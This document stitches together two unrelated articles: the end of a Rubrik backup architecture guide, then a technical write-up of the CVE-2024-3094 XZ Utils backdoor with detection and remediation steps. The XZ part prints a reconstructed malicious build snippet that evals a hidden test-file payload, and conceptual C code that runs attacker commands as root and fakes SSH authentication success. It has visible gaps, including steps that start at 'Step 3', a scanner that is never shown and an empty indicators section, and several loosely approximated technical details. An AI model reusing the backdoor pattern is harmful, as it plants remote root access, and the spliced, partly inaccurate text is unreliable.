VMware VM (no database) | Storage snapshot | Zero | Crash consistent (acceptable)
VMware VM (with SQL Server) | VSS coordinated snapshot | Moderate | Application consistent
Physical SQL Server | VSS coordinated snapshot | Moderate to high | Application consistent
Physical SQL Server | Pure storage snapshot | Zero | Crash consistent (risky)
For a web server or file share, crash consistent is fine. The application has no transactional state worth protecting. For a database, crash consistent means trusting recovery logic rather than guaranteeing consistency.
6.1.6 The Uncomfortable Reality
The largest, most critical SQL Server databases, the ones that would benefit most from zero overhead instantaneous backup, are precisely the workloads where crash consistent snapshots carry the most risk. More transactions in flight. Larger buffer pools. More recovery time if something needs replay.
Rubrik supports VSS coordination because the alternative is shipping backups that might need crash recovery. That uncertainty is acceptable for test environments. It is rarely acceptable for production databases backing financial systems, customer records, or regulatory reporting.
The VSS tax is not a limitation imposed by Microsoft or avoided by competitors. It is the cost of consistency. Every backup platform that claims application consistent SQL Server protection is paying it. The only question is whether they admit the overhead exists.
7. Snapshot Based Protection Is Objectively Better (When You Can Get It)
The previous section explained why SQL Server backups cannot escape application coordination. VSS exists because transactional consistency requires it, and the coordination overhead is the price of certainty.
This makes the contrast with pure snapshot based protection even starker. Where snapshots work cleanly, they are not incrementally better. They are categorically superior.
7.1 What Pure Snapshots Deliver
Snapshot based backups in environments that support them provide:
Near instant capture: microseconds to milliseconds, regardless of dataset size
Zero application load: the workload never knows a backup occurred
Consistent recovery points: the storage layer guarantees point in time consistency
Predictable backup windows: duration is independent of data volume
No bandwidth consumption during capture: data movement happens later, asynchronously
A 50TB VMware datastore snapshots in the same time as a 50GB datastore. Backup windows become scheduling decisions rather than capacity constraints.
Rubrik exploits this deeply in VMware environments. Snapshot orchestration, instant VM recovery, and live mounts all depend on the hypervisor providing clean, consistent, zero overhead capture points.
7.2 Why This Is Harder Than It Looks
The elegance of snapshot based protection depends entirely on the underlying platform providing the right primitives. This is where the gap between VMware and everything else becomes painful.
VMware offers:
Native snapshot APIs with transactional semantics
Changed Block Tracking (CBT) for efficient incrementals
Hypervisor level consistency without guest coordination
Storage integration through VADP (vSphere APIs for Data Protection)
These are not accidental features. VMware invested years building a backup ecosystem because they understood that enterprise adoption required operational maturity, not just compute virtualisation.
Physical hosts offer none of this.
There is no universal snapshot API for bare metal servers. Storage arrays provide snapshot capabilities, but each vendor implements them differently, with different consistency guarantees, different integration points, and different failure modes. The operating system has no standard mechanism to coordinate application state with storage level capture.
7.3 The Physical Host Penalty
This is why physical SQL Server hosts face a compounding disadvantage:
No hypervisor abstraction: there is no layer between the OS and storage that can freeze state cleanly
VSS remains mandatory: application consistency still requires database coordination
No standardised incremental tracking: without CBT or equivalent, every backup must rediscover what changed
Storage integration is bespoke: each array, each SAN, each configuration requires specific handling
The result is that physical hosts with the largest databases—the workloads generating the most backup data, with the longest restore times, under the most operational pressure, receive the least architectural benefit from modern backup platforms.
They are stuck paying the VSS tax without receiving the snapshot dividend.
7.4 The Integration Hierarchy
Backup elegance follows a clear hierarchy based on platform integration depth:
Environment | Snapshot Quality | Incremental Efficiency | Application Consistency | Overall Experience
VMware (no database) | Excellent | CBT driven | Not required | Seamless
VMware (with SQL Server) | Excellent | CBT driven | VSS coordinated | Good with overhead
Cloud native (EBS, managed disks) | Good | Provider dependent | Varies by workload | Generally clean
Physical with enterprise SAN | Possible | Array dependent | VSS coordinated | Complex but workable
Physical with commodity storage | Limited | Often full scan | VSS coordinated | Painful
The further down this hierarchy, the more the backup platform must compensate for missing primitives. Rubrik handles this better than most, but even excellent software cannot conjure APIs that do not exist.
7.5 Why the Industry Irony Persists
The uncomfortable truth is that snapshot based protection delivers its greatest value precisely where it is least available.
A 500GB VMware VM snapshots effortlessly. The hypervisor provides everything needed. Backup is boring, as it should be.
A 50TB physical SQL Server, the database actually keeping the business running, containing years of transactional history, backing regulatory reporting and financial reconciliation, must coordinate through VSS, flush terabytes of buffer pool, sustain I/O pressure during capture, and hope the storage layer cooperates.
The workloads that need snapshot elegance the most are architecturally prevented from receiving it.
This is not a Rubrik limitation. It is not a Microsoft conspiracy. It is the accumulated consequence of decades of infrastructure evolution where virtualisation received backup investment and physical infrastructure did not.
7.6 What This Means for Architecture Decisions
Understanding this hierarchy should influence infrastructure strategy:
Virtualise where possible. The backup benefits alone often justify the overhead. A SQL Server VM with VSS coordination still benefits from CBT, instant recovery, and hypervisor level orchestration.
Choose storage with snapshot maturity. If physical hosts are unavoidable, enterprise arrays with proven snapshot integration reduce the backup penalty. This is not the place for commodity storage experimentation.
Accept the VSS overhead. For SQL Server workloads, crash consistent snapshots are technically possible but operationally risky. The coordination cost is worth paying. Budget for it in backup windows and I/O capacity.
Plan restore, not backup. Snapshot speed is irrelevant if restore requires hours of data rehydration. The architectural advantage of snapshots extends to recovery only if the platform supports instant mount and selective restore.
Rubrik’s value in this landscape is not eliminating the integration gaps, nobody can, but navigating them intelligently. Where snapshots work, Rubrik exploits them fully. Where they do not, Rubrik minimises the penalty through parallel restore, live mounts, and metadata driven recovery.
The goal remains the same: make restore the product, regardless of how constrained the backup capture had to be.
8. Rubrik Restore Policies: Strategy, Trade offs, and Gotchas
SLA Domains are Rubrik’s policy abstraction layer, and understanding how to configure them properly separates smooth recoveries from painful ones. The flexibility is substantial, but so are the consequences of misconfiguration.
8.1 Understanding SLA Domain Architecture
Rubrik’s policy model centres on SLA Domains, named policies that define retention, frequency, replication, and archival behaviour. Objects are assigned to SLA Domains rather than configured individually, which creates operational leverage but requires upfront design discipline.
The core parameters that matter for restore planning:
Snapshot Frequency determines your Recovery Point Objective (RPO). A 4-hour frequency means you could lose up to 4 hours of data. For SQL Server with log backup enabled, transaction logs between snapshots reduce effective RPO to minutes, but the full snapshot frequency still determines how quickly you can access a baseline restore point.
Local Retention controls how many snapshots remain on the Rubrik cluster for instant access. This is your Live Mount window. Data within local retention restores in minutes. Data beyond it requires rehydration from archive, which takes hours.
Replication copies snapshots to a secondary Rubrik cluster, typically in another location. This is your disaster recovery tier. Replication targets can serve Live Mount operations, meaning DR isn’t just “eventually consistent backup copies” but actual instant recovery capability at the secondary site.
Archival moves aged snapshots to object storage (S3, Azure Blob, Google Cloud Storage). Archive tier data cannot be Live Mounted, it must be retrieved first, which introduces retrieval latency and potentially egress costs.
8.2 The Retention vs. Recovery Speed Trade off
This is where most organisations get the policy design wrong.
The temptation is to keep minimal local retention and archive aggressively to reduce storage costs. The consequence is that any restore request older than a few days becomes a multi hour operation.
Consider the mathematics for a 5TB SQL Server database:
Recovery Scenario | Snapshot Location | Time to Access | Operational Impact
Yesterday’s backup | Within local retention | 2-5 minutes (Live Mount) | Minimal
Last week’s backup | Within local retention | 2-5 minutes (Live Mount) | Minimal
Last month’s backup | Archived | 4-8 hours (retrieval + restore) | Significant
Last quarter’s backup | Archived (cold tier) | 12-24 hours | Major incident
The storage cost of keeping 30 days local versus 7 days local might seem significant when multiplied across the estate. But the operational cost of a 6 hour restore delay during an audit request or compliance investigation often exceeds years of incremental storage spend.
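A rough way to sanity check this is to put both costs in the same units. All the rates below are illustrative assumptions, not Rubrik pricing:
# 5TB database; incremental snapshots held on cluster for instant access
db_tb = 5
daily_change_rate = 0.03            # assume ~3% of the database changes per day
local_cost_per_tb_month = 40.0      # assumed amortised appliance cost, $/TB/month
incident_cost_per_hour = 25_000.0   # assumed cost of a stalled audit or outage

def extra_local_tb(days):
    # incremental snapshot data retained locally for the window
    return db_tb * daily_change_rate * days

extra_storage = (extra_local_tb(30) - extra_local_tb(7)) * local_cost_per_tb_month
print(f"Extra local storage, 7 -> 30 day retention: ~${extra_storage:,.0f}/month")
print(f"One 6 hour archive retrieval delay:        ~${6 * incident_cost_per_hour:,.0f}")
Even with conservative numbers, a single archive retrieval delay dwarfs years of the incremental storage spend.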
Recommendation: Size local retention to cover your realistic recovery scenarios, not your theoretical minimum. For most organisations, 14-30 days of local retention provides the right balance between cost and operational flexibility.
8.3 SLA Domain Design Patterns
8.3.1 Pattern 1: Tiered by Criticality
Create separate SLA Domains for different criticality levels:
Platinum: 4 hour snapshots, 30 day local retention, synchronous replication, 7 year archive
Gold: 8 hour snapshots, 14 day local retention, asynchronous replication, 3 year archive
Silver: Daily snapshots, 7 day local retention, no replication, 1 year archive
Bronze: Daily snapshots, 7 day local retention, no replication, 90 day archive
This pattern works well when criticality maps cleanly to workload types, but creates governance overhead when applications span tiers.
8.3.2 Pattern 2: Tiered by Recovery Requirements
Align SLA Domains to recovery time objectives rather than business criticality:
Instant Recovery: Maximum local retention, synchronous replication, Live Mount always available
Same Day Recovery: 14 day local retention, asynchronous replication
Next Day Recovery: 7 day local retention, archive first strategy
This pattern acknowledges that “critical” and “needs instant recovery” aren’t always the same thing. A compliance archive might be business critical but tolerate 24 hour recovery times.
8.3.3 Pattern 3: Application Aligned
Create SLA Domains per major application or database platform:
SQL Server Production
SQL Server Non Production
Oracle Production
VMware Infrastructure
File Shares
This pattern simplifies troubleshooting and reporting but can lead to policy sprawl as the estate grows.
8.4 Log Backup Policies: The Hidden Complexity
For SQL Server and Oracle, snapshot frequency alone doesn’t tell the full story. Transaction log backups between snapshots determine actual RPO.
Rubrik supports log backup frequencies down to 1 minute for SQL Server. The trade offs:
Aggressive Log Backup (1-5 minute frequency):
Sub 5 minute RPO
Higher metadata overhead on Rubrik cluster
More objects to manage during restore
Longer Live Mount preparation time (more logs to replay)
Conservative Log Backup (15-60 minute frequency):
Acceptable RPO for most workloads
Lower operational overhead
Faster Live Mount operations
Simpler troubleshooting
Gotcha: Log backup frequency creates a hidden I/O load on the source database. A 1 minute log backup interval on a high transaction database generates constant log backup traffic. For already I/O constrained databases, this constant churn can be the straw that breaks the camel’s back.
Recommendation: Match log backup frequency to actual RPO requirements, not aspirational ones. If the business can tolerate 15 minutes of data loss, don’t configure 1 minute log backups just because you can.
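The arithmetic behind that recommendation is worth making explicit. A shorter interval is not just a better RPO; it is a metadata multiplier (the estate size below is an assumption):
# Worst case RPO and object count implied by each log backup interval
databases = 200          # assumed number of protected databases
for interval_min in (1, 5, 15, 60):
    per_day = 24 * 60 // interval_min
    print(f"{interval_min:>2} min interval: worst case RPO {interval_min:>2} min, "
          f"{per_day:>4} log backups/db/day, "
          f"{per_day * databases:>7,} objects/day across the estate")
A 1 minute interval generates 1,440 log backups per database per day, or 288,000 objects a day across 200 databases, every one of which must be indexed, retained, and replayed on restore.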
8.5 Replication Topology Gotchas
Replication seems straightforward, copy snapshots to another cluster, but the implementation details matter.
8.5.1 Gotcha 1: Replication Lag Under Load
Asynchronous replication means the target cluster is always behind the source. During high backup activity (month end processing, batch loads), this lag can extend to hours. If a disaster occurs during this window, you lose more data than your SLA suggests.
Monitor replication lag as an operational metric, not just a capacity planning number.
8.5.2 Gotcha 2: Bandwidth Contention with Production Traffic
Replication competes for the same network paths as production traffic. If your backup replication saturates a WAN link, production application performance degrades.
Either implement QoS policies to protect production traffic, or schedule replication during low utilisation windows. Rubrik supports replication scheduling, but the default is “as fast as possible,” which isn’t always appropriate.
8.5.3 Gotcha 3: Cascaded Replication Complexity
For multi site architectures, you might configure Site A → Site B → Site C replication. Each hop adds latency and failure modes. A Site B outage breaks the chain to Site C.
Consider whether hub and spoke (Site A replicates independently to both B and C) better matches your DR requirements, despite the additional bandwidth consumption.
8.6 Archive Tier Selection: Retrieval Time Matters
Object storage isn’t monolithic. The choice between storage classes has direct recovery implications.
Storage Class | Typical Retrieval Time | Use Case
S3 Standard / Azure Hot | Immediate | Frequently accessed archives
S3 Standard-IA / Azure Cool | Immediate (higher retrieval cost) | Infrequent but urgent access
S3 Glacier Instant Retrieval | Milliseconds | Compliance archives with occasional audit access
S3 Glacier Flexible Retrieval | 1-12 hours | Long-term retention with rare access
S3 Glacier Deep Archive | 12-48 hours | Legal hold, never access unless subpoenaed
Gotcha: Rubrik’s archive policy assigns snapshots to a single storage class. If your retention spans 7 years, all 7 years of archives pay the same storage rate, even though year 1 archives are accessed far more frequently than year 7 archives.
Recommendation: Consider tiered archive policies—recent archives to Standard-IA, aged archives to Glacier. This requires multiple SLA Domains and careful lifecycle management, but the cost savings compound significantly at scale.
8.7 Policy Assignment Gotchas
8.7.1 Gotcha 1: Inheritance and Override Conflicts
Rubrik supports hierarchical policy assignment (cluster → host → database). When policies conflict, the resolution logic isn’t always intuitive. A database with an explicit SLA assignment won’t inherit changes made to its parent host’s policy.
Document your policy hierarchy explicitly. During audits, the question “what policy actually applies to this database?” should have an immediate, verifiable answer.
8.7.2 Gotcha 2: Pre script and Post script Failures
Custom scripts for application quiescing or notification can fail, and failure handling varies. A pre script failure might skip the backup entirely (safe but creates a gap) or proceed without proper quiescing (dangerous).
Test script failure modes explicitly. Know what happens when your notification webhook is unreachable or your custom quiesce script times out.
8.7.3 Gotcha 3: Time Zone Confusion
Rubrik displays times in the cluster’s configured time zone, but SLA schedules operate in UTC unless explicitly configured otherwise. An “8 PM backup” might run at midnight local time if the time zone mapping is wrong.
Verify backup execution times after policy configuration, don’t trust the schedule display alone.
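A quick way to check what a UTC schedule means in local wall clock time, here assuming a Johannesburg cluster (swap in your own zone):
from datetime import datetime, timezone
from zoneinfo import ZoneInfo   # Python 3.9+

# An "8 PM" schedule stored as UTC...
utc_run = datetime(2025, 1, 15, 20, 0, tzinfo=timezone.utc)
# ...actually fires two hours later on the local clock:
print(utc_run.astimezone(ZoneInfo("Africa/Johannesburg")))  # 22:00 SAST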
8.8 Testing Your Restore Policies
Policy design is theoretical until tested. The following tests should be regular operational practice:
Live Mount Validation: Mount a backup from local retention and verify application functionality. This proves both backup integrity and Live Mount operational capability.
Archive Retrieval Test: Retrieve a backup from archive tier and time the operation. Compare actual retrieval time against SLA commitments.
Replication Failover Test: Perform a Live Mount from the replication target, not the source cluster. This validates that DR actually works, not just that replication is running.
Point in Time Recovery Test: For databases with log backup enabled, recover to a specific timestamp between snapshots. This validates that log chain integrity is maintained.
Concurrent Restore Test: Simulate a ransomware scenario by triggering multiple simultaneous restores. Measure whether your infrastructure can sustain the required parallelism.
8.9 Policy Review Triggers
SLA Domains shouldn’t be “set and forget.” Trigger policy reviews when:
Application criticality changes (promotion to production, decommissioning)
Recovery requirements change (new compliance mandates, audit findings)
Infrastructure changes (new replication targets, storage tier availability)
Performance issues emerge (backup windows exceeded, replication lag growing)
The goal is proactive policy maintenance, not reactive incident response when a restore takes longer than expected.
9. Ransomware: Where Architecture Is Exposed
9.1 The Restore Storm Problem
After ransomware, the challenge is not backup availability. The challenge is restoring everything at once.
Constraints appear immediately. East-west traffic saturates. DWDM links run hot. Core switch buffers overflow. Cloud egress throttling kicks in.
Rubrik mitigates this through parallel restores, SLA based prioritisation, and live mounts for critical systems. What it cannot do is defeat physics. A good recovery plan avoids turning a data breach into a network outage.
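The physics is easy to quantify. A minimal sketch with illustrative estate and link sizes; real world throughput will be meaningfully below line rate:
estate_tb = 300
links_gbps = {"core east-west": 100, "DWDM inter-site": 40, "cloud egress": 10}

for name, gbps in links_gbps.items():
    # TB -> gigabits, divide by line rate for seconds, then convert to hours
    hours = estate_tb * 8_000 / (gbps * 3600)
    print(f"{name:>16}: {hours:5.1f} hours to move everything at {gbps} Gbps")
Even at a full 100 Gbps, moving 300TB takes the better part of a working day; over a 10 Gbps egress path it takes most of three days. Prioritisation is not optional.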
10. SaaS vs Appliance: This Is a Network Decision
Functionally, Rubrik SaaS and on prem appliances share the same policy engine, metadata index, and restore semantics.
The difference is bandwidth reality.
On prem appliances provide fast local restores, predictable latency, and minimal WAN dependency. SaaS based protection provides excellent cloud workload coverage and operational simplicity, but restore speed is bounded by network capacity and egress costs.
Hybrid estates usually require both.
11. Why Rubrik in the Cloud?
Cloud providers offer native backup primitives. These are necessary but insufficient. They do not provide unified policy across environments, cross account recovery at scale, ransomware intelligence, or consistent restore semantics. Rubrik turns cloud backups into recoverable systems rather than isolated snapshots.
11.1 Should You Protect Your AWS Root and Crypto Accounts?
Yes, because losing the control plane is worse than losing data.
Rubrik protects IAM configuration, account state, and infrastructure metadata. After a compromise, restoring how the account was configured is as important as restoring the data itself.
12. Backup Meets Security (Finally)
Rubrik integrates threat awareness into recovery using entropy analysis, change rate anomaly detection, and snapshot divergence tracking. This answers the most dangerous question in recovery: which backup is actually safe to restore? Most platforms cannot answer this with confidence.
13. VMware First Class Citizen, Physical Hosts Still Lag
Rubrik’s deepest integrations exist in VMware environments, including snapshot orchestration, instant VM recovery, and live mounts.
The uncomfortable reality remains that physical hosts with the largest datasets would benefit most from snapshot based protection, yet receive the least integration. This is an industry gap, not just a tooling one.
14. When Rubrik Is Not the Right Tool
Rubrik is not universal.
It is a poorer fit when bandwidth is severely constrained, estates are very small, or tape workflows are legally mandated.
Rubrik’s value emerges at scale, under pressure, and during failure.
15. Conclusion: Boredom Is Success
Backups should be boring. Restores should be quiet. Executives should never know the platform exists.
The only time backups become exciting is when they fail, and that excitement is almost always lethal.
Rubrik is not interesting because it stores data. It is interesting because, when everything is already on fire, restore remains a controlled engineering exercise rather than a panic response.
CVE-2024-3094 represents one of the most sophisticated supply chain attacks in recent history. Discovered in March 2024, this vulnerability embedded a backdoor into XZ Utils versions 5.6.0 and 5.6.1, allowing attackers to compromise SSH authentication on Linux systems. With a CVSS score of 10.0 (Critical), this attack demonstrates the extreme risks inherent in open source supply chains and the sophistication of modern cyber threats.
This article provides a technical deep dive into how the backdoor works, why it’s extraordinarily dangerous, and practical methods for detecting compromised systems remotely.
Table of Contents
What Makes This Vulnerability Exceptionally Dangerous
The Anatomy of the Attack
Technical Implementation of the Backdoor
Detection Methodology
Remote Scanning Tools and Techniques
Remediation Steps
Lessons for the Security Community
What Makes This Vulnerability Exceptionally Dangerous
Supply Chain Compromise at Scale
Unlike traditional vulnerabilities discovered through code audits or penetration testing, CVE-2024-3094 was intentionally inserted through a sophisticated social engineering campaign. The attacker, operating under the pseudonym “Jia Tan,” spent over two years building credibility in the XZ Utils open source community before introducing the malicious code.
This attack vector is particularly insidious for several reasons:
Trust Exploitation: Open source projects rely on volunteer maintainers who operate under enormous time pressure. By becoming a trusted contributor over years, the attacker bypassed the natural skepticism that would greet code from unknown sources.
Delayed Detection: The malicious code was introduced gradually through multiple commits, making it difficult to identify the exact point of compromise. The backdoor was cleverly hidden in test files and binary blobs that would escape cursory code review.
Widespread Distribution: XZ Utils is a fundamental compression utility used across virtually all Linux distributions. The compromised versions were integrated into Debian, Ubuntu, Fedora, and Arch Linux testing and unstable repositories, affecting potentially millions of systems.
The Perfect Backdoor
What makes this backdoor particularly dangerous is its technical sophistication:
Pre-authentication Execution: The backdoor activates before SSH authentication completes, meaning attackers can gain access without valid credentials.
Remote Code Execution: Once triggered, the backdoor allows arbitrary command execution with the privileges of the SSH daemon, typically running as root.
Stealth Operation: The backdoor modifies the SSH authentication process in memory, leaving minimal forensic evidence. Traditional log analysis would show normal SSH connections, even when the backdoor was being exploited.
Selective Targeting: The backdoor contains logic to respond only to specially crafted SSH certificates, making it difficult for researchers to trigger and analyze the malicious behavior.
Timeline and Near Miss
The timeline of this attack demonstrates how close the security community came to widespread compromise:
Late 2021: “Jia Tan” begins contributing to XZ Utils project
2022-2023: Builds trust through legitimate contributions and pressures maintainer Lasse Collin
February 2024: Backdoored versions 5.6.0 and 5.6.1 released
March 29, 2024: Andres Freund, a PostgreSQL developer, notices unusual SSH behavior during performance testing and discovers the backdoor
March 30, 2024: Public disclosure and emergency response
Had Freund not noticed the 500ms SSH delay during unrelated performance testing, this backdoor could have reached production systems across the internet. The discovery was, by the discoverer’s own admission, largely fortuitous.
The Anatomy of the Attack
Multi-Stage Social Engineering
The attack began long before any malicious code was written. The attacker needed to:
Establish Identity: Create a credible online persona with consistent activity patterns
Build Reputation: Make legitimate contributions to build trust
Apply Pressure: Create artificial urgency around maintainer succession
Gain Commit Access: Become a co-maintainer with direct repository access
This process took approximately two years, demonstrating extraordinary patience and planning. The attacker created multiple personas to pile social pressure onto the sole maintainer, playing on his burnout and apparent need for help.
Code Insertion Strategy
The malicious code was inserted through several mechanisms:
Obfuscated Build Scripts: The backdoor was triggered through the build system rather than in the main source code. Modified build scripts would inject malicious code during compilation.
Binary Test Files: Large binary test files were added to the repository, containing encoded malicious payloads. These files appeared to be legitimate test data but actually contained the backdoor implementation.
Multi-Commit Obfuscation: The backdoor was introduced across multiple commits over several weeks, making it difficult to identify a single “smoking gun” commit.
Ifunc Abuse: The backdoor used GNU indirect function (ifunc) resolvers to hook into the SSH authentication process at runtime, modifying program behavior without changing the obvious code paths.
Technical Implementation of the Backdoor
How XZ Utils Connects to SSH
To understand the backdoor, we must first understand an unexpected dependency chain:
On many modern Linux distributions, the SSH daemon links against libsystemd for process notification and logging. The systemd library, in turn, links against liblzma for compression functionality. This creates an indirect but critical dependency: SSH loads XZ Utils’ compression library into its address space.
The attackers exploited this dependency chain to inject their backdoor into the SSH authentication process.
Stage 1: Build Time Injection
The attack begins during the XZ Utils build process:
# Simplified representation of the malicious build script
if test -f "$srcdir/tests/files/good-large_compressed.lzma"; then
    # Extract and execute embedded script from "test file"
    eval $(xz -dc "$srcdir/tests/files/good-large_compressed.lzma" | head -c 1024)
fi
The build script would:
Detect specific binary test files in the source tree
Decompress these files to extract shell commands
Execute the extracted commands during the build process
Modify the liblzma source code to include backdoor hooks
These binary test files appeared legitimate because they were valid LZMA compressed data. However, they contained carefully crafted payloads that would only activate under specific conditions.
Stage 2: Runtime Hooking
Once compiled with the malicious modifications, liblzma contains an ifunc resolver that executes early during library loading:
// Conceptual representation of the backdoor logic
int backdoor_rsa_verify(unsigned char *signature, RSA *key) {
    // Check if signature contains magic bytes
    if (signature_contains_trigger(signature)) {
        // Extract and execute payload from certificate
        char *command = decode_payload(signature);
        // Execute with sshd privileges (typically root)
        system(command);
        // Return success to bypass authentication
        return 1;
    }
    // Otherwise, perform normal verification
    return original_rsa_verify(signature, key);
}
The backdoor:
Intercepts all SSH authentication attempts
Examines the RSA signature for special markers
If triggered, extracts commands from the certificate
Executes commands with root privileges
Returns success to complete the “authentication”
From the SSH server’s perspective, this appears as a normal successful authentication. The logs would show a legitimate connection from an authorized user, even though no valid credentials were presented.
Why Traditional Detection Fails
The backdoor was designed to evade common security measures:
No Network Signatures: The malicious traffic looks identical to normal SSH, using standard protocols and ports.
No File System Artifacts: The backdoor exists only in memory after library loading. No malicious files are written to disk during exploitation.
Clean Source Code: The primary liblzma source code remains clean. The modifications occur during build time and aren’t present in the repository’s main files.
Log Evasion: Successful backdoor authentication appears in logs as a normal SSH connection, complete with username and source IP.
Selective Activation: The backdoor only responds to specially crafted certificates, making it difficult to trigger during security research or scanning.
Detection Methodology
Since the backdoor operates at runtime and leaves minimal artifacts, detection focuses on behavioral analysis rather than signature matching.
Timing Based Detection
The most reliable detection method exploits an unintended side effect: the backdoor’s cryptographic operations introduce measurable timing delays.
Normal SSH server (10 samples):
- Mean: 180ms
- Std Dev: 25ms
- Variance: 625ms²
Backdoored SSH server (10 samples):
- Mean: 850ms
- Std Dev: 180ms
- Variance: 32,400ms²
The backdoored server shows both higher average timing and greater variance, as the backdoor’s overhead varies depending on system state and what initialization code paths execute.
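A minimal sketch of what such a timing probe can look like. It measures time to first SSH banner over repeated TCP connections, which is a crude proxy for the pre-authentication delay Freund observed; a full scanner (like the ssh_backdoor_scanner.py referenced later) would compare these samples against a baseline from a known clean host on the same network path:
import socket
import statistics
import sys
import time

def banner_time_ms(host: str, port: int = 22) -> float:
    """Time from TCP connect to receipt of the SSH version banner."""
    start = time.monotonic()
    with socket.create_connection((host, port), timeout=10) as sock:
        sock.recv(256)
    return (time.monotonic() - start) * 1000.0

host = sys.argv[1] if len(sys.argv) > 1 else "example.com"
samples = [banner_time_ms(host) for _ in range(10)]
print(f"mean {statistics.mean(samples):.0f}ms, "
      f"stdev {statistics.stdev(samples):.0f}ms over {len(samples)} samples")
# Elevated mean AND variance together, relative to the clean baseline,
# are the suspicious signature; absolute numbers depend on network path.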
Banner Analysis
While not definitive, certain configurations increase vulnerability likelihood:
# SSH banner typically reveals:
SSH-2.0-OpenSSH_9.6p1 Debian-5ubuntu1
# Breaking down the information:
# OpenSSH_9.6p1 - Version commonly affected
# Debian-5ubuntu1 - Distribution and package version
Debian and Ubuntu were the primary targets because:
They quickly incorporated the backdoored versions into testing repositories
They use systemd, creating the sshd → libsystemd → liblzma dependency chain
They enable systemd notification in sshd by default
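Collecting that banner remotely takes only a few lines, since SSH servers send their version string as soon as the TCP connection opens (hostname below is a placeholder):
import socket

def grab_ssh_banner(host: str, port: int = 22, timeout: float = 5.0) -> str:
    with socket.create_connection((host, port), timeout=timeout) as sock:
        return sock.recv(256).decode(errors="replace").strip()

print(grab_ssh_banner("example.com"))
# e.g. SSH-2.0-OpenSSH_9.6p1 Debian-5ubuntu1 -> flag Debian/Ubuntu package
# strings from the affected window for closer, timing based inspection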
Library Linkage Analysis
On accessible systems, verifying SSH’s library dependencies provides definitive evidence:
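A small sketch of that check from Python, shelling out to ldd; on affected Debian and Ubuntu builds, liblzma appears in sshd’s resolved dependencies via libsystemd:
import shutil
import subprocess

sshd = shutil.which("sshd") or "/usr/sbin/sshd"
deps = subprocess.run(["ldd", sshd], capture_output=True, text=True).stdout
liblzma = [line.strip() for line in deps.splitlines() if "liblzma" in line]
print("liblzma linkage:", liblzma or "none resolved")

# Cross check the installed xz version: 5.6.0 and 5.6.1 are the backdoored releases
print(subprocess.run(["xz", "--version"], capture_output=True, text=True).stdout.strip())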
For integration with existing security scanning workflows, an Nmap NSE script can wrap the same checks in standardized vulnerability reporting; NSE scripts are written in Lua and plug directly into Nmap’s scanning engine.
Step 3: Containment
If any of these checks suggest compromise, isolate the system before touching anything else, preserving forensic state as you go:
# Isolate the system from network
# Save current state for forensics first
netstat -tupan > /tmp/netstat_snapshot.txt
ps auxf > /tmp/process_snapshot.txt
# Then block incoming SSH
iptables -I INPUT -p tcp --dport 22 -j DROP
# Or shutdown SSH entirely
systemctl stop ssh
Step 4: Remediation
For systems with the vulnerable version but no evidence of compromise:
# Debian/Ubuntu systems
apt-get update
apt-get install --only-upgrade xz-utils
# Verify the new version
xz --version
# Should show a 5.4.x build (NOT 5.6.0 or 5.6.1)
# Alternative: Explicit downgrade
apt-get install xz-utils=5.4.5-0.3
# Restart SSH to unload old library
systemctl restart ssh
# Verify library version
readlink -f /lib/x86_64-linux-gnu/liblzma.so.5
# Should NOT be 5.6.0 or 5.6.1
# Confirm SSH no longer shows timing anomalies
# Run scanner again from remote system
./ssh_backdoor_scanner.py remediated-server.com
# Monitor for a period
tail -f /var/log/auth.log
System Hardening Post Remediation
After removing the backdoor, implement additional protections: limit SSH exposure to the internet, prefer key based authentication, and baseline the performance of critical services so that anomalies like Freund’s 500ms delay stand out.
Lessons for the Security Community
This attack highlights critical vulnerabilities in the open source ecosystem:
Maintainer Burnout: Many critical projects rely on volunteer maintainers working in isolation. The XZ Utils maintainer was a single individual managing a foundational library with limited resources and support.
Trust But Verify: The security community must develop better mechanisms for verifying not just code contributions, but also the contributors themselves. Multi-year social engineering campaigns can bypass traditional code review.
Automated Analysis: Build systems and binary artifacts must receive the same scrutiny as source code. The XZ backdoor succeeded partly because attention focused on C source files while malicious build scripts and test files went unexamined.
Dependency Awareness: Understanding indirect dependency chains is critical. Few would have identified XZ Utils as SSH-related, yet this unexpected connection enabled the attack.
Detection Strategy Evolution
The fortuitous discovery of this backdoor through performance testing suggests the security community needs new approaches:
Behavioral Baselining: Systems should establish performance baselines for critical services. Deviations, even subtle ones, warrant investigation.
Timing Analysis: Side-channel attacks aren’t just theoretical concerns. Timing differences can reveal malicious code even when traditional signatures fail.
Continuous Monitoring: Point-in-time security assessments miss time-based attacks. Continuous behavioral monitoring can detect anomalies as they emerge.
Cross-Discipline Collaboration: The backdoor was discovered by a database developer doing performance testing, not a security researcher. Encouraging collaboration across disciplines improves security outcomes.
Infrastructure Recommendations
Organizations should implement:
Binary Verification: Don’t just verify source code. Ensure build processes are deterministic and reproducible. Compare binaries across different build environments.
Runtime Monitoring: Deploy tools that can detect unexpected library loading, function hooking, and behavioral anomalies in production systems.
Network Segmentation: Limit the blast radius of compromised systems through proper network segmentation and access controls.
Incident Response Preparedness: Have procedures ready for supply chain compromises, including rapid version rollback and system isolation capabilities.
The Role of Timing in Security
This attack demonstrates the importance of performance analysis in security:
Performance as Security Signal: Unexplained performance degradation should trigger security investigation, not just performance optimization.
Side Channel Awareness: Developers should understand that any observable behavior, including timing, can reveal system state and potential compromise.
Benchmark Everything: Establish performance baselines for critical systems and alert on deviations.
Conclusion
CVE-2024-3094 represents a watershed moment in supply chain security. The sophistication of the attack, spanning years of social engineering and technical preparation, demonstrates that determined adversaries can compromise even well-maintained open source projects.
The backdoor’s discovery was largely fortuitous, happening during unrelated performance testing just before the compromised versions would have reached production systems worldwide. This near-miss should serve as a wake-up call for the entire security community.
The detection tools and methodologies presented in this article provide practical means for identifying compromised systems. However, the broader lesson is that security requires constant vigilance, comprehensive monitoring, and a willingness to investigate subtle anomalies that might otherwise be dismissed as performance issues.
As systems become more complex and supply chains more intricate, the attack surface expands beyond traditional code vulnerabilities to include the entire software development and distribution process. Defending against such attacks requires not just better tools, but fundamental changes in how we approach trust, verification, and monitoring in software systems.
The XZ Utils backdoor was detected and neutralized before widespread exploitation. The next supply chain attack may not be discovered so quickly, or so fortunately. The time to prepare is now.
Additional Resources
Technical References
National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2024-3094
Technical Analysis by Sam James: https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27
Detection Tools
The scanner tools discussed in this article are available for download and can be deployed in production environments for ongoing monitoring. They require no authentication to the target systems and work by analyzing observable timing behavior in the SSH handshake and authentication process.
These tools should be integrated into regular security scanning procedures alongside traditional vulnerability scanners and intrusion detection systems.
Indicators of Compromise
